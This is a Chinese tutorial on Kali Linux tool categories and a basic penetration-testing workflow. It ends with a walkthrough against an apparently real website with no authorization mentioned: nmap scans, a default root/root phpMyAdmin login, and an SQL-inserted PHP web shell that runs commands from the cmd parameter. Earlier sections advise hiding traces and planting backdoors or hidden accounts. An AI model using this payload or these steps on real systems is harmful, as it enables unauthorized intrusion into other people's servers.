Kali Linux 和 渗透测试
From:http://www.anquan.us/static/drops/tips-826.html
作為一個滲透測試學(xué)習(xí)者必知必讀的好書推薦:https://zhuanlan.zhihu.com/p/23561475
學(xué)長們給我們的書目:https://lorexxar.cn/2014/12/29/bookshelf1/
Kali 工具集列表(全是英文說明,如看不懂可以使用瀏覽器的網(wǎng)頁翻譯,全部翻譯成中文):https://tools.kali.org/
Kali 簡介
? ? ? ? 如果您之前使用過或者了解BackTrack系列Linux的話,那么我只需要簡單的說,Kali是BackTrack的升級換代產(chǎn)品,從Kali開始,BackTrack將成為歷史。如果您沒接觸過BackTrack也沒關(guān)系,我們從頭開始了解Kali Linux。
? ? ? ? 按照官方的定義,Kali Linux是一個高級滲透測試和安全審計Linux發(fā)行版。作為使用者,我簡單的把它理解為,一個特殊的Linux發(fā)行版,集成了精心挑選的滲透測試和安全審計的工具,供滲透測試和安全設(shè)計人員使用。也可稱之為平臺或者框架。作為Linux發(fā)行版,Kali Linux是在BackTrack Linux的基礎(chǔ)上,遵循Debian開發(fā)標(biāo)準(zhǔn),進(jìn)行了完全重建。并且設(shè)計成單用戶登錄,root權(quán)限,默認(rèn)禁用網(wǎng)絡(luò)服務(wù)。關(guān)于系統(tǒng)特性,定制,在不同設(shè)備上的安裝,請在Kali Linux官網(wǎng):http://www.kali.org?上查閱。官網(wǎng)上還有一份中文版的說明文檔,但是我總覺得要么是自動翻譯的,要么是外國人自行翻譯的,讀起來非常不通順,但是仍然可作為參考,見?https://docs.kali.org?。
VMware 虛擬機(jī)安裝?Kali 教程
Kali Linux滲透測試實戰(zhàn) 第一章:http://www.anquan.us/static/drops/tips-826.html
Kali中文和英文版本切換
如果安裝的時候是英文版本,那么先進(jìn)入All settings系統(tǒng)設(shè)置頁面,然后選擇Region&Language,進(jìn)入Language選擇中文(如果是切換到英文版本,只要選擇English),然后注銷重新登錄,或者reboot重啟。但是有時候中文版本有小問題,所以能看懂的還是用英文版本,看不懂再切回中文版本。
中文文檔
因為本書的核心內(nèi)容是滲透測試,Kali Linux只是平臺,更多的關(guān)于系統(tǒng)本身的內(nèi)容不會詳細(xì)介紹。下面我們來看看Kali自帶的工具集,介紹完這些工具,相信你也就了解了Kali Linux的功能。
上圖是安裝完Kali Linux(在下一節(jié),會簡單介紹虛擬機(jī)下Kali Linux的安裝和配置)系統(tǒng)自帶的工具集。最頂層是十佳安全工具,這些工具都被包含在下面的工具分類中。
Kali Linux將所帶的工具集劃分為十四個大類,這些大類中,很多工具是重復(fù)出現(xiàn)的,因為這些工具同時具有多種功能,比如nmap既能作為信息搜集工具也能作為漏洞探測工具。其中大部分工具的使用,都會在之后的章節(jié)中做介紹和實例演示。另外,這里介紹的工具都是系統(tǒng)默認(rèn)推薦的工具,我們也可以自行添加新的工具源,豐富工具集。根據(jù)筆者的經(jīng)驗,絕大多數(shù)情況下,系統(tǒng)推薦的工具已經(jīng)足夠使用了。一些專用工具,會在特定的測試場景下被引入,在后續(xù)章節(jié)中會詳細(xì)說明。
信息搜集
信息搜集工具集又分為DNS分析、IDS/IPS識別、SMB分析、SMTP分析、SNMP分析、SSL分析、VoIP分析、VPN分析、存活主機(jī)識別、電話分析、服務(wù)指紋識別、流浪分析、路由分析、情報分析、系統(tǒng)指紋識別共15個小分類。
上圖是老版本的 Kali ,下圖是新版本的Kali,可以看到信息搜集包含好幾部分,每一部分都對應(yīng)有不同的工具。
可以看到新版本 Kali 和老版本還是有區(qū)別的,有些工具新版本可能刪了,或者用其他工具代替了。
信息搜集工具分類
Dns分析工具
DNS分析包含dnsdict6、dnsenum等12個工具,如下圖。
IDS和IPS識別工具
IDS/IPS
? ? ? ? IDS(intrusion detection system),即入侵檢測系統(tǒng)。是一種對網(wǎng)絡(luò)傳輸進(jìn)行即時監(jiān)視,在發(fā)現(xiàn)可疑傳輸時發(fā)出警報或者采取主動反應(yīng)措施的網(wǎng)絡(luò)安全設(shè)備。它與其他網(wǎng)絡(luò)安全設(shè)備的不同之處便在于,IDS是一種積極主動的安全防護(hù)技術(shù)。
 ? ? ? ? IPS(Intrusion Prevention System)即入侵防御系統(tǒng)。IPS位于防火墻和網(wǎng)絡(luò)的設(shè)備之間。這樣,如果檢測到攻擊,IPS會在這種攻擊擴(kuò)散到網(wǎng)絡(luò)的其它地方之前阻止這個惡意的通信。
 二者的區(qū)別:
 ? ? ? ? 1. 入侵檢測系統(tǒng)注重的是網(wǎng)絡(luò)安全狀況的監(jiān)管。入侵防御系統(tǒng)關(guān)注的是對入侵行為的控制。
 ? ? ? ? 2. 入侵檢測系統(tǒng)需要部署在網(wǎng)絡(luò)內(nèi)部的中心點,需要能夠觀察到所有網(wǎng)絡(luò)數(shù)據(jù)。入侵防御系統(tǒng)需要部署在網(wǎng)絡(luò)的邊界。
 ? ? ? ? 3. 入侵檢測系統(tǒng)的核心價值在于通過對全網(wǎng)信息的分析,了解信息系統(tǒng)的安全狀況,進(jìn)而指導(dǎo)信息系統(tǒng)安全建設(shè)目標(biāo)以及安全策略的確立和調(diào)整,而入侵防御系統(tǒng)的核心價值在于安全策略的實施—對黑客行為的阻擊;入侵檢測系統(tǒng)需要部署在網(wǎng)絡(luò)內(nèi)部,監(jiān)控范圍可以覆蓋整個子網(wǎng),包括來自外部的數(shù)據(jù)以及內(nèi)部終端之間傳輸?shù)臄?shù)據(jù),入侵防御系統(tǒng)則必須部署在網(wǎng)絡(luò)邊界,抵御來自外部的入侵,對內(nèi)部攻擊行為無能為力。
參考:http://security.zdnet.com.cn/security_zone/2009/0412/1362627.shtml
IDS/IPS識別包含fragrout、fragrouter、ftest、lbd、wafwOOf四個工具。
smb分析
smb分析包含如下工具:
smb協(xié)議
SMB簡介:SMB是Server Message Block的簡寫,這個協(xié)議用于共享文件,共享打印機(jī),共享串口等用途。我們之所以能夠在windows的網(wǎng)絡(luò)鄰居下訪問一個域內(nèi)的其他機(jī)器,就是通過這個協(xié)議實現(xiàn)的。SMB 協(xié)議是一個很重要的協(xié)議,目前絕大多數(shù)的PC上都在運(yùn)行這一協(xié)議,windows系統(tǒng)都充當(dāng)著SMB協(xié)議的客戶端和服務(wù)器,所以SMB是一個遵循客戶機(jī)服/務(wù)器模式的協(xié)議。SMB服務(wù)器負(fù)責(zé)通過網(wǎng)絡(luò)提供可用的共享資源給SMB客戶機(jī),服務(wù)器和客戶機(jī)之間通過TCP/IP協(xié)議、或者IPX協(xié)議、或者是 NetBEUI進(jìn)行連接。
參考:http://msdn.microsoft.com/en-us/library/cc246231.aspx
smtp分析
smtp分析包含如下工具:
snmp分析
報告如下工具:
SSL分析
VOIP分析
VoIP分析包含如下工具:
VoIP簡介
VoIP是 Voice over Internet Protocol的縮寫,指的是將模擬的聲音訊號經(jīng)過壓縮與封包之后,以數(shù)據(jù)封包的形式在IP 網(wǎng)絡(luò)的環(huán)境進(jìn)行語音訊號的傳輸,通俗來說也就是互聯(lián)網(wǎng)電話、網(wǎng)絡(luò)電話或者簡稱IP電話的意思。
參考資料:https://www.cisco.com/application/pdf/en/us/guest/tech/tk587/c1506/ccmigration_09186a008012dd36.pdf
VPN分析
只包含一個工具:ike-scan
存活主機(jī)識別
包含的工具:
服務(wù)器指紋識別
包含如下工具:
流量分析
包含如下工具:
路由分析
包含如下工具:
情報分析
包含如下工具:
網(wǎng)絡(luò)掃描
含如下工具:
系統(tǒng)指紋識別
包含如下工具:
指紋識別:
在實際的生產(chǎn)環(huán)境中,應(yīng)用程序返回的軟件、服務(wù)器、操作系統(tǒng)的相關(guān)信息,很有可能是偽裝過的。比如請求一臺apathe服務(wù)器,如果它在http響應(yīng)中返回的是IIS 6.0的信息,如果我們簡單的認(rèn)為它是iis服務(wù)器,并以此為依據(jù)繼續(xù)接下來的滲透工作,豈不是南轅北轍?指紋識別技術(shù)應(yīng)運(yùn)而生,向測試對方發(fā)送特殊的請求,根據(jù)響應(yīng)內(nèi)容的不同來做出正確的識別,這種技術(shù)稱之為指紋識別技術(shù)。常用的操作系統(tǒng)指紋識別技術(shù)為IP協(xié)議棧。
鏈接http://nmap.org/book/osdetect-fingerprint-format.html是Nmap操作系統(tǒng)指紋識別的基本原理
漏洞分析
漏洞分析工具集
漏洞分析工具集,共分為6個小類,分別為Cisco工具集、Fuzzing工具集、OpenVAS、開源評估軟件、掃描工具集、數(shù)據(jù)庫評估軟件。
Cisco工具集
包含如下工具:
Fuzzing工具集
包含如下工具:
Fuzzing
模糊測試 (fuzz testing, fuzzing)是一種軟件測試技術(shù)。其核心思想是自動或半自動的生成隨機(jī)數(shù)據(jù)輸入到一個程序中,并監(jiān)視程序異常,如崩潰,斷言(assertion)失敗,以發(fā)現(xiàn)可能的程序錯誤,比如內(nèi)存泄漏。模糊測試常常用于檢測軟件或計算機(jī)系統(tǒng)的安全漏洞。
模糊測試工具主要分為兩類,變異測試(mutation-based)以及生成測試(generation-based)。模糊測試可以被用作白盒,灰盒或黑盒測試。3文件格式與網(wǎng)絡(luò)協(xié)議是最常見的測試目標(biāo),但任何程序輸入都可以作為測試對象。常見的輸入有環(huán)境變量,鼠標(biāo)和鍵盤事件以及API調(diào)用序列。甚至一些通常不被考慮成輸入的對象也可以被測試,比如數(shù)據(jù)庫中的數(shù)據(jù)或共享內(nèi)存。
參考:https://www.owasp.org/index.php/Fuzzing
OpenVAS?
包含如下工具:
OpenVAS
OpenVAS是一款開放式的漏洞評估工具,主要用來檢測目標(biāo)網(wǎng)絡(luò)或主機(jī)的安全性。與安全焦點的X-Scan工具類似,OpenVAS系統(tǒng)也采用了Nessus較早版本的一些開放插件。OpenVAS能夠基于C/S(客戶端/服務(wù)器),B/S(瀏覽器/服務(wù)器)架構(gòu)進(jìn)行工作,管理員通過瀏覽器或者專用客戶端程序來下達(dá)掃描任務(wù),服務(wù)器端負(fù)載授權(quán),執(zhí)行掃描操作并提供掃描結(jié)果。
參考:http://www.openvas.org/
開源評估軟件
包含如下工具:
掃描工具集
包含如下工具:
Database 評估軟件
包含如下工具:
Web程序
Web程序下主要包含CMS識別、IDS/IPS識別、Web漏洞掃描、Web爬行、Web應(yīng)用代理、Web應(yīng)用漏洞挖掘、Web庫漏洞利用共7個類別。
密碼攻擊
密碼攻擊主要包括GPU工具集、Passing the Hash、離線攻擊、在線攻擊。Passing the Hash
Passing the Hash,中文一般翻譯為Hash傳遞攻擊。在windows系統(tǒng)中,系統(tǒng)通常不會存儲用戶登錄密碼,而是存儲密碼的Hash值。在我們遠(yuǎn)程登錄系統(tǒng)的時候,實際上向遠(yuǎn)程傳輸?shù)木褪敲艽a的Hash。當(dāng)攻擊者獲取了存儲在計算機(jī)上的用戶名和密碼的hash值 的時候,他雖然不知道密碼值,但是仍然可以通過直接連接遠(yuǎn)程主機(jī),通過傳送密碼的hash值來達(dá)到登錄的目的。
無線攻擊
無線攻擊包含RFID/NFC工具集、Software Defined Radio、藍(lán)牙工具集、其他無線工具、無線工具集。
Software Defined Radio
軟件無線電(Software Defined Radio,SDR)是一種實現(xiàn)無線通信的新概念和體制。一開始應(yīng)用在軍事領(lǐng)域,在21世紀(jì)初,由于眾多公司的努力,使得它已從軍事領(lǐng)域轉(zhuǎn)向民用領(lǐng)域,成為經(jīng)濟(jì)的、應(yīng)用廣泛的、全球通信的第三代移動通信系統(tǒng)的戰(zhàn)略基礎(chǔ)。
由于無線通信領(lǐng)域存在的一些問題,如多種通信體系并存,各種標(biāo)準(zhǔn)競爭激烈,頻率資源緊張等,特別是無線個人通信系統(tǒng)的發(fā)展,使得新的系統(tǒng)層出不窮,產(chǎn)品生產(chǎn)周期越來越短,原有的以硬件為主的無線通信體制難以適應(yīng)這種局面,迫使軟件無線電的概念的出現(xiàn)。它的出現(xiàn),使無線通信的發(fā)展經(jīng)歷了由固定到移動,由模擬到數(shù)字,由硬件到軟件的三次變革。
參考:http://zh.wikipedia.org/wiki/%E8%BD%AF%E4%BB%B6%E6%97%A0%E7%BA%BF%E7%94%B5
漏洞利用工具集
漏洞利用工具集,主要包含了幾個流行的框架,和其他工具。
BeEF XSS Framework,官方站點http://beefproject.com/。全稱Browser Exploitation Framework,它是專注于 web瀏覽器的滲透測試框架。
Metasploit,官方站點http://www.metasploit.com/。著名的滲透測試框架,是滲透測試人員的必修課。
嗅探/欺騙
嗅探、欺騙 包含VoIP、Web嗅探、網(wǎng)絡(luò)欺騙、網(wǎng)絡(luò)嗅探、語言監(jiān)控五個工具集。
權(quán)限維持
權(quán)限維持包含Tunnel工具集、Web后門、系統(tǒng)后門三個子類。
其中Tunnel工具集包含了一系列用于建立通信隧道、代理的工具。
逆向工程
逆向工程,包含了Debug工具集、反編譯、其他逆向工具集三個子類。
壓力測試
壓力測試包含VoIP壓力測試、Web壓力測試、網(wǎng)絡(luò)壓力測試、無線壓力測試四個子類。
硬件Hacking
硬件Hacking包括Android工具集、Arduino工具集兩個子類。
數(shù)字取證
數(shù)字取證工具集包含PDF取證工具集、反數(shù)字取證、密碼取證工具集、內(nèi)存取證工具集、取證分割工具集、取證分析工具集、取證哈希驗證工具集、取證鏡像工具集、殺毒取證工具集、數(shù)字取證、數(shù)字取證套件。
報告工具集
報告工具集,主要用于生成、讀取、整理滲透測試報告的工具,包含Domentation、媒體捕捉、證據(jù)管理。
系統(tǒng)服務(wù)
系統(tǒng)服務(wù)是系統(tǒng)上的服務(wù)程序,包括BeFF、Dradis、HTTP、Metasploit、MySQL、OpenVas、SSH。
默認(rèn)情況下,網(wǎng)絡(luò)和數(shù)據(jù)庫服務(wù)是關(guān)閉的,需要重新開啟。
小結(jié):上面對Kali Linux的默認(rèn)工具集進(jìn)行的了大致的瀏覽,由于本書只關(guān)注于滲透測試,對逆向工程、壓力測試、硬件Hacking、數(shù)字取證這些工具不會涉及。
滲透測試的一般化流程
滲透測試實戰(zhàn) site:baidu.com
 滲透測試思路 site:baidu.com
 帶你入門滲透測試的5個項目:https://www.jianshu.com/p/5b82e42ae346
 滲透測試的一些總結(jié):http://www.freebuf.com/articles/3562.html
網(wǎng)站滲透測試原理及詳細(xì)過程:http://blog.csdn.net/kingmax54212008/article/details/11833059
凡事預(yù)則立,不預(yù)則廢,做任何事情都要有一個預(yù)先的計劃。滲透測試作為測試學(xué)科的一個分支,早已形成了完整的方法論。在正式開始本書的實踐教學(xué)章節(jié)之前,我也想談一談使用Kali Linux的基本方法。這里討論方法論的目的有兩個:
第一,在第一節(jié)里,我們看到Kali Linux集成了這么多工具,而且更令人欣喜的是已經(jīng)對這些工具進(jìn)行了專業(yè)的分類。這些工具的使用場景和使用階段是什么樣的呢?把工具拿來胡亂一頓掃描是不會有什么結(jié)果的。
 第二,本書的章節(jié)規(guī)劃,也需要一個規(guī)范,這個規(guī)范是我從滲透測試方法論中學(xué)來的,并進(jìn)行了簡化,稱之為“滲透測試的一般化流程”。
 當(dāng)然本節(jié)內(nèi)容不會長篇大論,也不適用于企業(yè)內(nèi)部的專業(yè)的滲透測試團(tuán)隊來遵循。只是希望給初學(xué)滲透測試的同學(xué)一個入門的指引,有章可循,有法可依。只是學(xué)習(xí)本書的基本練習(xí)流程,不是標(biāo)準(zhǔn)的測試流程。
 下面這這張圖是《backtrack4 利用滲透測試保證系統(tǒng)安全》一書的Backtrack方法論。
它將滲透測試分成了十個步驟,其中第6步“社會工程學(xué)”為可選步驟,但是筆者認(rèn)為社會工程學(xué)在滲透測試的任何一個流程中都有用武之地,它是安全測試的一個方法,不應(yīng)該成為一個單獨的流程。在本書中,我們將整個過程劃分為5個步驟。
信息搜集
在練習(xí)過程中,選擇目標(biāo)的過程,讀者自行完成。在講解具體漏洞攻擊的章節(jié)中,還會講解一些如何快速查找特定目標(biāo)的方法。本書假定讀者已經(jīng)準(zhǔn)備好了測試目標(biāo)才閱讀和實踐書中內(nèi)容,所以流程的第一步為信息搜集。
在這一步中,我們盡可能的使用多種信息搜集工具,包括搜索引擎和社會工程學(xué)方法。對能收集到的信息,來者不拒。
 只有建立在足夠信息分析的基礎(chǔ)上,滲透測試才能游刃有余。因為信息越多,發(fā)現(xiàn)漏洞的幾率越大。
 同時對不同應(yīng)用的信息收集的側(cè)重點也不同。比如web應(yīng)用和桌面應(yīng)用,對于web應(yīng)用,服務(wù)器操作系統(tǒng)、web服務(wù)器類型、web后臺語言會被首先關(guān)注;而對于桌面應(yīng)用,更多的是關(guān)心應(yīng)用程序本身。
發(fā)現(xiàn)漏洞
在搜集了足夠的信息之后,首先我們要判斷它會存在哪些漏洞。這可以通過搜索引擎,和通用的漏洞掃描工具來完成。通常使用搜索引擎是明智的選擇,比如我們在第一步中知道對方站點的編寫語言為php 5.3.*,可以在google搜索“php 5.3”漏洞。
很多專業(yè)的bug站點的信息,更值得我們駐足。這樣我們就可以針對性的進(jìn)行漏洞掃描。此時使用專門的漏洞掃描工具比通用工具來得更實際和高效。
攻擊
基本上,你能得到的漏洞,都可以找到對應(yīng)的攻擊方法。Kali Linux中也提供了很多現(xiàn)成的工具,來幫助我們順利的攻擊目標(biāo)。
這一步包含兩個方面,一個是利用現(xiàn)有漏洞利用,一個是提權(quán)。二者有時候是一回事,比如權(quán)限漏洞。
 滲透測試和以破壞為目的的黑客行為還是有區(qū)別的,測試的目的是證明漏洞的存在,而不是搞破壞。所以有時候攻擊成功之后可能測試任務(wù)就結(jié)束了,當(dāng)然這和測試目標(biāo)是緊密相關(guān)的。
 攻擊還包含一個重要的內(nèi)容,就是如何隱藏攻擊行為或者清除攻擊痕跡。讓對方無法或者說很難通過反追蹤技術(shù)查找到攻擊者。
權(quán)限維持
權(quán)限維持階段,是我們成功攻破一個系統(tǒng)后,如何繼續(xù)保持對系統(tǒng)的控制權(quán)限的問題。
一般會創(chuàng)建高權(quán)限的隱藏賬戶,或者安裝后門程序(包括木馬,病毒)。
文檔化
文檔化不是本書的強(qiáng)制流程,但是筆者強(qiáng)烈建議我們對每次滲透測試的過程和結(jié)果進(jìn)行文檔化處理。這樣會形成知識的積累。當(dāng)然如果你是專業(yè)的滲透測試工程師或者手上有滲透測試的項目,那么標(biāo)準(zhǔn)化文檔是必不可少的。
小試牛刀之Web滲透測試
給大家展示一個滲透測試的簡單示例。該示例操作簡單,環(huán)境真實,主要是為了給您一個整體上的感知,同時提升學(xué)習(xí)滲透測試的興趣。滲透測試的每一步并沒有記錄完整的細(xì)節(jié)信息。
首先,我選擇了一個測試站點,下面對該站點www.xxxxoooo.cn,下面對其進(jìn)行滲透測試。
信息搜集
whois查詢
因為是cn域名,直接到http://ewhois.cnnic.net.cn查詢,更方便。
結(jié)果如下:
服務(wù)指紋識別
很多個人站點,都沒有自定義錯誤信息的習(xí)慣。在url上隨便輸入一個不存在的地址,看是否會返回有用的信息。
通過上圖,我們知道該站點的應(yīng)用程序由php編寫,web服務(wù)器為Apathe/2.2.22,操作系統(tǒng)為Ubuntu。下面我們通過指紋識別工具,進(jìn)行識別。
在終端啟動nmap,輸入如下命令:nmap -A -T4 www.xxxxoooo.cn
如圖,識別出來的服務(wù)和系統(tǒng)信息與報錯信息一致。
端口掃描
在終端執(zhí)行如下命令,使用nmap的tcp半開掃描方式來掃描打開的端口。命令:nmap -sS <targetiste>
綜合性掃描
該站點是需要登錄的,所以在非登錄情況下,常規(guī)掃描一般情況下意義不大。但是做一個基本的站點掃描還是必須的。當(dāng)然很多工具是支持登錄掃描的。因為是web應(yīng)用,一般情況下,我們是需要進(jìn)行完整的web應(yīng)用的漏洞掃描的。本實例忽略此步驟。
發(fā)現(xiàn)漏洞
對于web應(yīng)用,我們通常從操作系統(tǒng)、服務(wù)、應(yīng)用本身三個方面來挖掘漏洞。
從站點應(yīng)用上分析,一般的php程序會安裝phpmyadmin組件,用來管理數(shù)據(jù)庫。google一下,我們就會知道phpmyadmin 默認(rèn)安裝在站點根目錄下。測試一下當(dāng)前站點是否也在默認(rèn)目錄下安裝了phpmyadmin呢?
ok,確實存在phpmyadmin。繼續(xù)google “phpmyadmin 默認(rèn)用戶名密碼”。Googele之后,我們知道:“phpMyAdmin默認(rèn)使用的是MySQL的帳戶和密碼”。MySql的默認(rèn)賬戶是root,默認(rèn)密碼是空,但是phpmyadmin是不允許空密碼的。繼續(xù) Google“inurl: phpmyadmin”,可以看到很多關(guān)于phpmyadmin的文章。
這些文章略過,google“hack phpmyadmin”,看看有什么發(fā)現(xiàn)?
在這篇文章《Hacking PHPMyadmin (when import.php deleted)》
(https://www.facebook.com/learnadvhacking/posts/556247631077238)中,我注意到
很多站點都配置默認(rèn)密碼為root。是不是也可以嘗試下呢?輸入用戶名root,密碼root,奇跡就這么出現(xiàn)了,直接登錄管理后臺。
進(jìn)入后臺之后,我們得到了更為詳盡的信息,為我們下一步攻擊打下了基礎(chǔ)
攻擊與權(quán)限維持
上面的步驟,我們完成了對網(wǎng)站數(shù)據(jù)庫的攻擊,其實拿到了網(wǎng)站數(shù)據(jù)庫,就是拿到了整個網(wǎng)站的控制權(quán)。
如何利用phpmyadmin進(jìn)行提權(quán),從而得到服務(wù)器的控制權(quán)呢?
 目前在phpmyadmin后臺,我們可以操作表,向表中寫數(shù)據(jù),如果數(shù)據(jù)庫有權(quán)限dump數(shù)據(jù)到web站點所在的文件夾,那么可以先將一個網(wǎng)馬寫到數(shù)據(jù)庫再保存到磁盤本地,再從瀏覽器訪問網(wǎng)馬,是不是就可以了呢?
 首先在phpmyadmin后臺找到一個數(shù)據(jù)庫,在“SQL”選項卡執(zhí)行sql語句創(chuàng)建一個表“hacker”。
語句執(zhí)行成功后,再插入一條數(shù)據(jù),代碼很簡單,希望能用php的system函數(shù)執(zhí)行系統(tǒng)指令。
INSERT INTO hacker (packet)VALUES( '<pre><body bgcolor=silver><? @system($_GET["cmd"]); ?></body></pre>' );下一步就是保存插入的記錄到站點目錄下,但是站點的物理路徑是什么呢?我在觀察頁面請求鏈接的時候,發(fā)現(xiàn)一個404鏈接。
404鏈接的路徑是http://www.xxxxx.cn/var/www/productions/22_production.zip。這個是進(jìn)行網(wǎng)站開發(fā)時候常犯的靜態(tài)鏈接的錯誤,那是不是說網(wǎng)站的根目錄在”/var/www”下呢,我把去掉”/var/www”,文件可以被正常訪問。其實這也是ubuntu默認(rèn)的站點目錄。接下來就試試有沒有權(quán)限保存文件了。
經(jīng)過一番查找,終于找到一個有寫權(quán)限的目錄,將網(wǎng)馬寫到web目錄中,得到了webshell,接下來就不用詳解了吧。
小結(jié):這個簡單的小例子,只是想告訴大家,滲透測試有什么并沒有那么困難。也沒有哪種方法,哪個工具或者平臺是萬能的,最重要的是你自己的努力和思考。
為您推薦了適合您的技術(shù)文章:
總結(jié)
以上是生活随笔為你收集整理的Kali Linux 和 渗透测试的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
 
                            
                        